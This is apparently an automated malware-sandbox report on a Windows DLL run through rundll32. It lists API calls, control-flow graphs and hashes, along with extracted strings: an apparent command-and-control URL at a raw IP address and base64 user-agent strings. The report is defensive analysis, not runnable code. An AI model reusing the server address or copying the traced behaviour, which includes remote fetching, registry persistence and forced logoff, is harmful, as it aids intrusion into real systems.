                                                                                                                                            • Sleep.KERNEL32(00001388,?,?,Function_00006A6E), ref: 100087D8
                                                                                                                                            • CreateThread.KERNEL32(?,?,Function_0000841C,?,?,?,?,?,Function_00006A6E), ref: 100087E4
                                                                                                                                            • Sleep.KERNEL32(000000FF,?,?,Function_0000841C,?,?,?,?,?,Function_00006A6E), ref: 100087E8
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateSleepThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4202482776-0
                                                                                                                                            • Opcode ID: 7611a2c7549d694aa888d6d647670ac1460baf17db733e16608d155f4bf44ca4
                                                                                                                                            • Instruction ID: 2df9746d7e78e8372c6e87ac4aa0691d1060a96339f5c4ce5d4c7b8b7a8da0f8
                                                                                                                                            • Opcode Fuzzy Hash: 7611a2c7549d694aa888d6d647670ac1460baf17db733e16608d155f4bf44ca4
                                                                                                                                            • Instruction Fuzzy Hash: 46E05EE024435DBDF321B2791CC8DFF1E0DEB812FCB254252F528100CB6A540D048AB2

                                                                                                                                            Control-flow Graph

                                                                                                                                            control_flow_graph 494 10006b1f-10006b5f call 1002005c call 10003ece GetLastError 499 10006b90-10006bc0 call 1002a5e7 call 10038e15 494->499 500 10006b61-10006b8e CreateThread call 1002420a call 1002ab9b Sleep 494->500 510 10006bc2-10006bc5 499->510 511 10006bca-10006bcf 499->511 512 10006c66-10006c68 510->512 513 10006bd5-10006bd6 511->513 514 10006c56-10006c65 call 1000ccf2 511->514 515 10006bd9-10006be3 513->515 514->512 518 10006be5-10006be9 515->518 519 10006beb-10006bf1 515->519 518->519 520 10006bf3-10006bf7 519->520 521 10006bf9-10006c3a 519->521 520->521 522 10006c40-10006c45 521->522 523 10006c3c 521->523 524 10006c47 522->524 525 10006c4b-10006c50 522->525 523->522 524->525 525->515 526 10006c52-10006c55 525->526 526->514
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 10003ECE: CreateMutexA.KERNEL32(?,?,?,10006B50,?,?,?,00000202,?), ref: 10003EDA
                                                                                                                                            • GetLastError.KERNEL32 ref: 10006B55
                                                                                                                                            • CreateThread.KERNEL32(?,?,1000687E), ref: 10006B6B
                                                                                                                                            • Sleep.KERNEL32(00002710,?,00000000,00000000,000000FF,?,?,1000687E), ref: 10006B88
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Create$ErrorLastMutexSleepThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 145085098-0
                                                                                                                                            • Opcode ID: 9fdb200d5929ef7e8f6a96f443088d0c96ecfb43422a1e838647d38a76ea70c1
                                                                                                                                            • Instruction ID: 4f35827bfa7b5ea93410d600da94e256639eda4c8ceaa52b9f8b13dee9a51c26
                                                                                                                                            • Opcode Fuzzy Hash: 9fdb200d5929ef7e8f6a96f443088d0c96ecfb43422a1e838647d38a76ea70c1
                                                                                                                                            • Instruction Fuzzy Hash: 463182714043905EF716DB284C45EA7BFAEDF5A390B14416AF8A5CB287D620D941C771

                                                                                                                                            Control-flow Graph

                                                                                                                                            control_flow_graph 527 10007101-10007119 call 1000cc9e 530 1000711b-10007160 call 10005c4c 527->530 533 10007162-10007169 530->533 534 1000716b 530->534 535 10007170-100071a4 call 10003ef4 call 1000ccec call 100061bd 533->535 534->535 542 100071a6-100071b2 Sleep 535->542 543 100071b7-100071bb 535->543 542->530 544 100071d9-100071e3 call 1000ccf2 543->544 545 100071bd-100071c7 543->545 544->542 551 100071e5-100071f5 call 1000cde2 544->551 546 100071c9-100071cd 545->546 547 100071cf 545->547 549 100071d3-100071d7 546->549 547->549 549->544 549->545 551->542 554 100071f7-1000720c wsprintfA call 1000570f 551->554 554->542
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            • http://107.160.131.254:23588/article.php, xrefs: 1000716B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleepwsprintf
                                                                                                                                            • String ID: http://107.160.131.254:23588/article.php
                                                                                                                                            • API String ID: 1749205058-3833642815
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 10003F0A: InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 10003F1C
                                                                                                                                            • ___crtGetTimeFormatEx.LIBCMT ref: 10006201
                                                                                                                                            Strings
                                                                                                                                            • TW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNi4xOyB6aC1DTjsgcnY6MS45LjIuMTUpIEdlY2tvLzIwMTEwMzAzIEZpcmVmb3gvMy42LjE1, xrefs: 100061D0
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FormatInternetOpenTime___crt
                                                                                                                                            • String ID: TW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNi4xOyB6aC1DTjsgcnY6MS45LjIuMTUpIEdlY2tvLzIwMTEwMzAzIEZpcmVmb3gvMy42LjE1
                                                                                                                                            • API String ID: 483802873-1756078650
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 10003F0A: InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 10003F1C
                                                                                                                                            • ___crtGetTimeFormatEx.LIBCMT ref: 100062BF
                                                                                                                                              • Part of subcall function 10003F24: InternetOpenUrlA.WININET(80000100,00000000,00000000,00000000,00000000,10006206), ref: 10003F39
                                                                                                                                            Strings
                                                                                                                                            • TW96aWxsYS80LjAgKGNvbXBhdGlibGUp, xrefs: 10006298
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InternetOpen$FormatTime___crt
                                                                                                                                            • String ID: TW96aWxsYS80LjAgKGNvbXBhdGlibGUp
                                                                                                                                            • API String ID: 1165476586-1918919809
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleep
                                                                                                                                            • String ID: C:\Program Files
                                                                                                                                            • API String ID: 3472027048-1387799010
                                                                                                                                            APIs
                                                                                                                                            • RegCreateKeyExA.KERNEL32(?,00000000,000F003F,00000000,?,00000000,00000000,80000001,10006D60,?,10006D60,80000001,00000000,00000000,REG_SZ,00000000), ref: 1000408A
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Create
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2289755597-0
                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyExA.KERNEL32(?,?,?,?,?), ref: 100040CC
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Open
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 71445658-0
                                                                                                                                            APIs
                                                                                                                                            • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 10003F1C
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InternetOpen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2038078732-0
                                                                                                                                            APIs
                                                                                                                                            • CreateMutexA.KERNEL32(?,?,?,10006B50,?,?,?,00000202,?), ref: 10003EDA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                             • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateMutex
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1964310414-0
                                                                                                                                            • Opcode ID: f03030767440787e5e8ee563cbeb237b89049fd46284869140ae0419c91515a8
                                                                                                                                            • Instruction ID: 0bba5641deb9fc7c6708226b57f3740a3060a6e77b98bc1f4937df3feb83fb0f
                                                                                                                                            • Opcode Fuzzy Hash: f03030767440787e5e8ee563cbeb237b89049fd46284869140ae0419c91515a8
                                                                                                                                            • Instruction Fuzzy Hash: 51B0093A408220BFDF025F90DD4880ABBA2BB88362F24C958F6A941031C7328420EB02
                                                                                                                                            APIs
                                                                                                                                            • GetShortPathNameA.KERNEL32(?,?,?), ref: 10004003
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                             • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: NamePathShort
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1295925010-0
                                                                                                                                            • Opcode ID: b2e0d57d01f7aa481c28775ec103b2c79e6903a2f37fda92ba0980fa6487b9be
                                                                                                                                            • Instruction ID: 299f2b121c0b8d63d2f16659a91a8a26a6eb1e7383ee0b7c2fbbf344de06ce20
                                                                                                                                            • Opcode Fuzzy Hash: b2e0d57d01f7aa481c28775ec103b2c79e6903a2f37fda92ba0980fa6487b9be
                                                                                                                                            • Instruction Fuzzy Hash: BCB0097A509210BFDF025B91DE4880ABBA2AB89321F10C958F2A940031C7328520EB12
                                                                                                                                            APIs
                                                                                                                                            • Process32First.KERNEL32(00000000,00000000), ref: 1000410C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                             • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FirstProcess32
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2623510744-0
                                                                                                                                            • Opcode ID: 4be810b948c5642b78a3303991c31d5753e2f497cabb41971bfbf009a223d646
                                                                                                                                            • Instruction ID: d0469a6573cf8832cc4e791a541241725128130187f64684ac8c75673cb250d8
                                                                                                                                            • Opcode Fuzzy Hash: 4be810b948c5642b78a3303991c31d5753e2f497cabb41971bfbf009a223d646
                                                                                                                                            • Instruction Fuzzy Hash: B8A00176509612ABDA42AB51CE4884ABEA2FBA8381F01C819F18940434CB3284A5EB12
                                                                                                                                            APIs
                                                                                                                                            • GetDriveTypeA.KERNEL32(?,1000824C,10015940), ref: 1000400E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                             • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DriveType
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 338552980-0
                                                                                                                                            • Opcode ID: 2ee3dedfe077572030ca3591167bf26a544b4eb7bba9e94adf73c1260513ac4d
                                                                                                                                            • Instruction ID: e310fc801df329cbdffcf5e880badee8d9e0b58f708c6ac467addbfbb1e58057
                                                                                                                                            • Opcode Fuzzy Hash: 2ee3dedfe077572030ca3591167bf26a544b4eb7bba9e94adf73c1260513ac4d
                                                                                                                                            • Instruction Fuzzy Hash: 029002305055119BDE015B10CE4940A7E71AB84701B00C4A4E04541130C7328810EE01
                                                                                                                                            APIs
                                                                                                                                            • RegCloseKey.KERNEL32(?,10006DBE,?), ref: 10004096
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                             • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Close
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3535843008-0
                                                                                                                                            • Opcode ID: 2d988dbd5b15decafcf846d532543195a702f6c68f6a27351b5815321025a744
                                                                                                                                            • Instruction ID: c461232d01f39555025ee1551a6f08c036cd225bd5518e59674b318f5e785400
                                                                                                                                            • Opcode Fuzzy Hash: 2d988dbd5b15decafcf846d532543195a702f6c68f6a27351b5815321025a744
                                                                                                                                            • Instruction Fuzzy Hash: 799002705055119BDE415B11CF494097AA5AB84701B008458E04A41030C7318810EA01
                                                                                                                                            APIs
                                                                                                                                            • gethostbyname.WS2_32(00000000), ref: 10003EB8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                             • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: gethostbyname
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 930432418-0
                                                                                                                                            • Opcode ID: dcfbcd4351272649fb1253f470343220905ed4c20dbbca1a40d0a1126bf3fd71
                                                                                                                                            • Instruction ID: ddc175de635f80408d7ee48a1059bf0ffdd1ba2c9e36570999931cb834b2f0bc
                                                                                                                                            • Opcode Fuzzy Hash: dcfbcd4351272649fb1253f470343220905ed4c20dbbca1a40d0a1126bf3fd71
                                                                                                                                            • Instruction Fuzzy Hash: F7900270545110ABDE015B21CF4A4097A61AB85B01B048454E14940031C7318810EA12
                                                                                                                                            APIs
                                                                                                                                            • InternetCloseHandle.WININET(000000FF), ref: 10003F5C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                             • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseHandleInternet
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1081599783-0
                                                                                                                                            • Opcode ID: 8d0e7f3340f86714890c3e5e57ace766e80008fe382fb5a6cdacf87e5adc2a77
                                                                                                                                            • Instruction ID: 28d98f4ef2c514375b8ebea010dbda7bec799427eab40d5dd6f08137a7235d83
                                                                                                                                            • Opcode Fuzzy Hash: 8d0e7f3340f86714890c3e5e57ace766e80008fe382fb5a6cdacf87e5adc2a77
                                                                                                                                            • Instruction Fuzzy Hash: EB9002304041149BDE015B10CF494097A71BB85B05B108454E04541030C7318810EA01
                                                                                                                                            APIs
                                                                                                                                            • PathFileExistsA.SHLWAPI(00080000,10005C92,?,?,%s\lang.ini,C:\Users\user\Desktop,?,00000000,00080000), ref: 10003F76
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                             • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                             • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExistsFilePath
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1174141254-0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: K
                                                                                                                                            • API String ID: 0-856455061
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: K
                                                                                                                                            • API String ID: 0-856455061
                                                                                                                                            APIs
                                                                                                                                            • InternetReadFile.WININET(?,?,?,?), ref: 10003F51
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileInternetRead
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 778332206-0
                                                                                                                                            APIs
                                                                                                                                            • ExitWindowsEx.USER32(000000BC,000000BC), ref: 10003F6B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExitWindows
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1089080001-0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: '
                                                                                                                                            • API String ID: 0-1997036262
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmp
